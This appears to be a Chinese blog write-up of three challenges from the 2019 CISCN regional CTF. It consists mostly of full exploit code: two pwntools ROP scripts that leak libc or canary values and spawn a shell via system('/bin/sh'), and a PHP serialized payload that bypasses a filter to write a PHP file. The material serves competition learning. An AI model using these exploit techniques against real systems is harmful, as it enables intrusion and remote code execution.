2019CISCN华中赛区分区赛部分wp

最新推荐文章于 2024-06-27 20:21:16 发布
原创 最新推荐文章于 2024-06-27 20:21:16 发布 · 1.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析两个安全挑战:一是64位程序中的栈溢出漏洞,利用流程劫持获取shell;二是对象注入攻击,通过精心构造的payload绕过限制,实现文件创建。文章详细展示了如何使用Python脚本进行漏洞利用,包括泄露地址、计算基址和调用系统函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

pwn1

64位程序,只开启了NX(栈不可执行)保护,试着运行发现是一个菜单题,选项二、三没用

拖到IDA中查看,发现在encrypt选项中存在gets造成的栈溢出漏洞

不过输进去的字符串被分段异或了,我们可以先进行异或一下,然后在输入程序中,程序再异或一下就是我们想要的payload了

当时写脚本的时候发现流程劫持后,第二次发送payload的时候,payload没有被程序异或,直接打就可以(这里耽误了我一点时间,失分了)

EXP:

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#r = remote("172.29.29.110",8888)
r = process("./Emachine")
file = ELF("./Emachine")
#libc = ELF("./libc6_2.23-0ubuntu10_amd64.so")
libc = ELF("./libc.so.6")
puts_plt = file.plt['puts']
puts_got = file.got['puts']
main_addr = 0x000000000400B28
__start_addr = 0x000000000400710
encode_addr = 0x0000000004009A0
r.recvuntil("Input your choice!\n")
r.sendline("1")
r.recvuntil("Input your Plaintext to be encrypted\n")

log.info("------------------------------ leak real addr -------------------------------------------")
offset = 0x50+8
pop_rdi_addr = 0x0000000000400c83
payload = offset*"b"+ p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
log.info(hex(len(payload)))
payload_list = []
for x in range(len(payload)):
	payload_list.append(payload[x])
print payload_list

for x in range(len(payload_list)):
	if ord(payload_list[x])<=96 or ord(payload_list[x]) >122:
		if ord(payload_list[x])<=64 or ord(payload_list[x]) >90:
			if ord(payload_list[x])>47 and ord(payload_list[x])<=57:
				payload_list[x] = chr(ord(payload_list[x])^0xf)
		else:
			payload_list[x] = chr(ord(payload_list[x])^0xe)
	else:
		payload_list[x] = chr(ord(payload_list[x])^0xd)
payload_change = ""
for x in range(len(payload_list)):
	payload_change+=payload_list[x]
log.info(hex(len(payload_change)))
r.sendline(payload_change)
r.recvuntil("Ciphertext\n")
r.recvuntil("\n",drop=True)
puts_addr = u64(r.recvuntil("\n",drop=True)+"\x00\x00")
libc_puts = libc.symbols['puts']
log.info("puts_addr:"+hex(puts_addr))
base_addr = puts_addr-libc_puts
log.info("base_addr:"+hex(base_addr))
system_addr = base_addr + libc.symbols['system']
log.info("system_addr:"+hex(system_addr))
#binsh_addr = 0x000000000018cd57+base_addr
binsh_addr = 0x000000000017d3f3+base_addr
log.info("binsh_addr:"+hex(binsh_addr))
exit_addr = 0x00000000000013213
log.info("------------------------------ leak success! -------------------------------------------")
log.info("------------------------------ getshell -------------------------------------------")
payload_2 = "a"*offset + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr)
# payload_list_2 = []
# for x in range(len(payload_2)):
# 	payload_list_2.append(payload_2[x])
# print payload_list_2
# for x in range(len(payload_list_2)):
# 	if ord(payload_list_2[x])<=96 or ord(payload_list_2[x]) >122:
# 		if ord(payload_list_2[x])<=64 or ord(payload_list_2[x]) >90:
# 			if ord(payload_list_2[x])>47 and ord(payload_list_2[x])<=57:
# 				payload_list_2[x] = chr(ord(payload_list_2[x])^0xf)
# 		else:
# 			payload_list_2[x] = chr(ord(payload_list_2[x])^0xe)
# 	else:
# 		payload_list_2[x] = chr(ord(payload_list_2[x])^0xd)
# payload_change_2 = ""
# for x in range(len(payload_list_2)):
# 	payload_change_2+=payload_list_2[x]
# log.info(hex(len(payload_change_2)))
# print payload_change_2
r.recvuntil("Input your choice!\n")
r.sendline("1")
r.recvuntil("Input your Plaintext to be encrypted\n")
r.sendline(payload_2)
r.recv()
# r.recv()
sleep(0.2)
r.interactive()

pwn4

这个pwn当时没做出来,还是自己不认真,题目并不难,感觉有点亏

64位程序,开启了canary保护和NX(栈不可执行)

拖到IDA中查看

在main函数中调用了四个函数

漏洞点在最后一个函数,第一个漏洞点就是scanf输入-或者是+的时候会泄露出栈上的值(当时也不知道这个点)

第二个漏洞点就是change功能时,没有限制base数组下标,造成任意地址修改,不过每次只能输入4个字节的数据并且是int类型

改变之后会根据改变的个数来排序payload,但是27没有限制进去,所以我们用27来绕过排序

Exp:

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
#nc 172.29.29.113 8888
#r = remote("172.29.29.113",8888)
r = process("./pwn4")
file = ELF("./pwn4")
libc = ELF("./libc.so.6")
r.recvuntil("do you would to sort your girlfriends?[Y/N/@]")
r.send("@")
r.recvuntil("please answer the question1:")
r.send("^")
r.recvuntil("please answer the question2:")
r.send("^")
r.recvuntil("please input your name:")
r.sendline("radish")
r.recvuntil("how many girlfriends do you have?\n")
r.sendline("30")
for x in range(10):
	r.recvuntil("girlfriends:")
	r.sendline(str(0))

for x in range(2):
	r.recvuntil("girlfriends:")
	r.sendline("-")
for x in range(18):
	r.recvuntil("girlfriends:")
	r.sendline(str(0))

r.recvuntil("this is the sort result:")
data = r.recvuntil("you can change your girlfriend\n",drop=True)
list_1 = data.split("  ")
list_2 = []
for x in range(len(list_1)-1):
	if eval(list_1[x])<0 or eval(list_1[x])>9:
		list_2.append(eval(list_1[x]))

for x in range(2):
	if list_2[x]<0:
		list_2[x] =  hex(0xffffffff+list_2[x]+1)
	else:
		list_2[x] = hex(list_2[x])
if list_2[0][-2:]=="00":
	canary = list_2[1]+list_2[0][2:]
	canary_1 = list_2[1]
	canary_2 = list_2[0]
else:
	canary = list_2[0]+list_2[1][2:]
	canary_1 = list_2[0]
	canary_2 = list_2[1]
log.info("canary: "+canary)
log.info("canary_1:"+canary_1)
log.info("canary_2:"+canary_2)

r.sendline("0")
r.recvuntil("which girlfriend do you want to change?")
r.sendline("27")
#gdb.attach(r)
for x in range(10):
	r.recvuntil("now change:\n")
	r.sendline(str(1))

#canary
r.recvuntil("now change:\n")
r.sendline(str(eval(canary_2))) 
r.recvuntil("now change:\n")
r.sendline(str(eval(canary_1))) 
#rbp
r.recvuntil("now change:\n")
r.sendline(str(1))
r.recvuntil("now change:\n")
r.sendline(str(1)) 
pop_rdi_addr = 0x0000000000400d93
puts_plt = file.plt['puts']
puts_got = file.got['puts']
main_addr = 0x000000000400895

#ret1
r.recvuntil("now change:\n")
r.sendline(str(int(pop_rdi_addr)))
r.recvuntil("now change:\n")
r.sendline(str(0))

#data1
r.recvuntil("now change:\n")
r.sendline(str(int(puts_got)))
r.recvuntil("now change:\n")
r.sendline(str(0))

#ret2
r.recvuntil("now change:\n")
r.sendline(str(int(puts_plt)))
r.recvuntil("now change:\n")
r.sendline(str(0))

#ret3
r.recvuntil("now change:\n")
r.sendline(str(int(main_addr)))
r.recvuntil("now change:\n")
r.sendline(str(0))

for x in range(5):
	r.recvuntil("now change:\n")
	r.sendline(str(0))
puts_addr = u64(r.recvuntil("\n",drop=True)+"\x00\x00")
base_addr = puts_addr-libc.symbols['puts']
system_addr = base_addr+libc.symbols['system']
binsh_addr = base_addr+0x000000000017d3f3
log.info("puts_addr:"+hex(puts_addr))
log.info("base_addr:"+hex(base_addr))
log.info("system_addr:"+hex(system_addr))
log.info("binsh_addr:"+hex(binsh_addr))

def change_addr(data):
	data_hex = hex(data)
	a = data_hex[:6]
	b = "0x"+data_hex[6:]
	return eval(a),eval(b)

system_addr_1,system_addr_2 = change_addr(system_addr)
binsh_addr_1,binsh_addr_2 = change_addr(binsh_addr)

r.recvuntil("how many girlfriends do you have?\n")
r.sendline("1")
r.recvuntil("girlfriends:")
r.sendline("1")
r.recvuntil("you can change your girlfriend\n")
r.sendline("0")
r.recvuntil("which girlfriend do you want to change?")
r.sendline("27")

for x in range(10):
	r.recvuntil("now change:\n")
	r.sendline(str(1))

#canary
r.recvuntil("now change:\n")
r.sendline(str(eval(canary_2))) 
r.recvuntil("now change:\n")
r.sendline(str(eval(canary_1))) 
#rbp
r.recvuntil("now change:\n")
r.sendline(str(1))
r.recvuntil("now change:\n")
r.sendline(str(1)) 

#ret1
r.recvuntil("now change:\n")
r.sendline(str(int(pop_rdi_addr)))
r.recvuntil("now change:\n")
r.sendline(str(0))


#data1
r.recvuntil("now change:\n")
r.sendline(str(int(binsh_addr_2)))
r.recvuntil("now change:\n")
r.sendline(str(int(binsh_addr_1)))

#ret2
r.recvuntil("now change:\n")
r.sendline(str(int(system_addr_2)))
r.recvuntil("now change:\n")
r.sendline(str(int(system_addr_1)))


for x in range(7):
	r.recvuntil("now change:\n")
	r.sendline(str(0))

sleep(0.2)
r.interactive()

web1

给出源码,很容易发现这是一个对象注入的题

<?php 
// ini_set("display_errors", "On");  
// error_reporting(E_ALL | E_STRICT); 
class BlogLog { 
  public $log_ = '/tmp/web_log'; 
  public $content = '[access] %s'; 

  public function __construct($data=null) { 
    $temp = $this->init($data); 
    $this->render($temp); 
  } 

  public function init($data) { 
    // No, you can't control an object anymore! 
    $format = '/O:\d:/'; 
    $flag = true; 
    $flag = $flag && substr($data, 0, 2) !== 'O:'; 
    $flag = $flag && (!preg_match($format, $data)); 
    if ($flag){ 
      return ($data); 
    } 
    return []; 
  } 

  public function createLog($filename=null, $content=null) { 
    if ($this->log_ != null) 
      $filename = $this->log_; 
    if ($this->content != null) 
      $content = $this->content; 
    file_put_contents($filename, $content); 
  } 

  public function render($k) { 
    echo sprintf($this->content, $k['name']); 
  } 

  public function __destruct() { 
    $this->createLog(); 
  } 
} 

$data = ""; 
if (isset($_GET['data'])){ 
  $data = $_GET['data']; 
  new BlogLog($data); 
} 
else 
  highlight_file(__FILE__);

销毁对象的时候调用createLog函数,createLog函数会利用file_put_contents创建一个文件,并且unserialize的参数我们可控,所以造成对象注入

题目限制

  • data不能是一O:,也就是说不能是对象的反序列化后的字符串
  • 字符串中不能有/O:\d:/,我们可以在长度前面加上+来绕过

构造payload

<?php 
class BlogLog { 
  public $log_ = './radish.php'; 
  public $content = '<?php phpinfo();?>'; 
}
$a = new BlogLog();
$arr = array("luobu"=>"radish",$a);
echo serialize($arr);
?>

payload是a:2:{i:1;s:3:"wxm";i:2;O:+7:"BlogLog":2:{s:4:"log_";s:12:"./radish.php";s:7:"content";s:18:"<?php phpinfo();?>";}}

进行URL编码一下就可以创建文件了

[CISCN 2019 初赛]Love Math -wp
freerats的博客
08-19 623
<?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r'
2021ciscn初赛web部分简单wp
weixin_45805993的博客
05-24 575
0x00. 简单的题不想写wp,难的题写不出来……这篇博客应该会比较水,不喜勿喷 0x01.easy_source Payload http://xxxxxxxxxx/index.php?rc=splFileobject&ra=.index.php.swo&ra=php://filter/read=convert.base64-encode/resource=index.php&rb=rb&rd=fgets 挺简单的,不细说了 用php原生类splFileObject,用ge
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
2021 ciscn 华中赛区分区赛 pwn note
yongbaoii的博客
09-02 484
libc 2.31 保护是都拉上的。 刚开始有个花指令,通过一定的调整,再反汇编,就得到了正确的结果。 可以看到除了必要的初始化setbuf之外还将4050的地方清空了。 后面我们会看到4050就是存放地址的地方。 add 看一下content的输入 很明显的off by one。 整体结构还是比较清晰的,最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。 很明显的off by one,我们的常规思路也就是overlap或者unlink。 因为这里泄露不了基地址,所以我
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 569
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
ciscn_2019_c_11wp
wuyvle的博客
02-01 672
看看代码主体 发现没有system函数 但有puts这个函数,就可以通过构造rop泄露出libc的版本和函数地址,利用LibcSearcher或者DynELF可以查到libc的版本,之后获取libc里面的地址构造ROP链,获取shell。 from pwn import * from LibcSearcher import * def encrypt(string): newstr = list(string) for i in range(len(newstr)): c
2019华中赛代码.zip_2019华中赛_ZHISHUPINGHUA_华中赛上新量
07-14
please ignore this files
PWN · TcachebinAttack | UAF】[2024CISCN · 华中赛区] note
Mr_Fmnwon的博客
06-26 397
一道简单的tcache劫持。
PWN · ret2libc | protobuf】[2024CISCN · 华中赛区]protoverflow
最新发布
Mr_Fmnwon的博客
06-27 1170
第一次遇到protobuf,如果没有了解过,是显然做不出来的。此次复现,也算是点亮了一个技能点Protocol Buffers,是Google公司开发的一种数据描述语言,类似于XML能够将结构化数据序列化,可用于数据存储、通信协议等方面。常用于跨平台和异构系统中进行RPC调用,序列化和反序列化效率高且体积比XML和JSON小得多,非常适合网络传输。为了能够和程序进行交互,我们需要先逆向分析得到Protobuf结构体,然后构造序列化后的Protobuf与程序进行交互。具体不如参考PWN佬。
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2464
2022 CISCN 初赛pwn的完整wp
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn 2022 华中赛区 misc
wha1e的博客
07-28 660
ciscn 2022 华中赛区 misc
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2802
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
ciscn 华中赛区分区赛 awd pwn1
yongbaoii的博客
07-15 604
罕见的有保护没有都开。 输入是input sb是第一个: :后面的第一个事sc sc后面第一个回车是sd sd后面第一个又是input E0存放着input E8放着sc 所以其实也就是回车为分界,一组一个回车。 :又将每一组分开,分别存放在E0,E8。 有个strcasecmp函数 头文件:#include <string.h> 定义函数:int strcasecmp (const char *s1, const char *s2); 函数说明:strcasecmp()用来比较参数s1 和.
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 596
ciscn_2019_s_3
ciscn_2019_s_3
m0_48127441的博客
04-07 266
pwn题目主要是为了获得flag文件 一般使用 syscall(exec) 获得shell 或者使用open + read 获得文件内容 syscall(rax= 0x3B, rdi = '/bin/sh', rsi = 0x0, rdx = 0x0) //execve 函数调用syscall system函数调用execve函数 因为封装过,调用参数有所变化,保护机制也有所区别 该题能栈溢出,但是不知道栈地址 发现正常输出(输入小于0x10的数据时),会讲rsi地...
【BUUCTFPwnCiscn_2019_s_3 | SROP SigreturnFrame函数使用
m0_55368674的博客
02-18 767
【BUUCTFPwnCiscn_2019_s_3 | SROP SigreturnFrame函数使用
[Buuoj刷题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 382
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1455
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值